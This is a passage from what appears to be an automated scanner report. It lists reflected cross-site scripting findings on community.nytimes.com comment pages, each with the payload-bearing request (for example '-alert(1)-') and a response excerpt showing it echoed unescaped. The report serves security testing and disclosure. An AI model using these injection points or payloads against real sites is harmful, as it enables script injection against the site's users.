User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70687

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
obal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142919";
var s_pagename = "2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f44b'-alert(1)-'ffb7079026e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments6f44b'-alert(1)-'ffb7079026e/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71428

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments6f44b'-alert(1)-'ffb7079026e';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a761b"><a>0b788a6f155 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71340

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2
...[SNIP]...

3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e568"><a>5f636f3fe12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34004

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott
...[SNIP]...

3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ef0"-alert(1)-"0efdcf8adda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70837

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
sglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143041";
var s_pagename = "2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e835'-alert(1)-'6462f262221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments8e835'-alert(1)-'6462f262221/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83378

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments8e835'-alert(1)-'6462f262221';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf869"><a>05cee7fdfb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83360

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_ass
...[SNIP]...

3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ba3"><a>7ad4e47b7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bott
...[SNIP]...

3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8483d"-alert(1)-"5bab4140001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81137

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143059";
var s_pagename = "2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52017'-alert(1)-'7d721cbfae3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments52017'-alert(1)-'7d721cbfae3/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82778

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments52017'-alert(1)-'7d721cbfae3';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7646f"><a>ff2a52994e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82760

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments7646f"><a>ff2a52994e8/artsbeat.blogs.nytimes.com/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crn
...[SNIP]...

3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a88"><a>97992b80823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34566

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com59a88"><a>97992b80823/yr/mo/day/proposal-recommends-charging-admission-at-the-smithsonian/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5
...[SNIP]...

3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa14"-alert(1)-"f0d8d5fb934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 80401

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Proposa
...[SNIP]...
tsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143063";
var s_pagename = "2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/?caa14"-alert(1)-"f0d8d5fb934=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 742aa'-alert(1)-'d3686b770d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments742aa'-alert(1)-'d3686b770d1/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments742aa'-alert(1)-'d3686b770d1';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b9"><a>40112219a54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70874

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>The Wee
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments949b9"><a>40112219a54/artsbeat.blogs.nytimes.com/yr/mo/day/the-week-in-culture-pictures-nov-12/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink
...[SNIP]...

3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37048"><a>fe7fd4940f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com37048"><a>fe7fd4940f8/2010/11/12/the-week-in-culture-pictures-nov-12/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
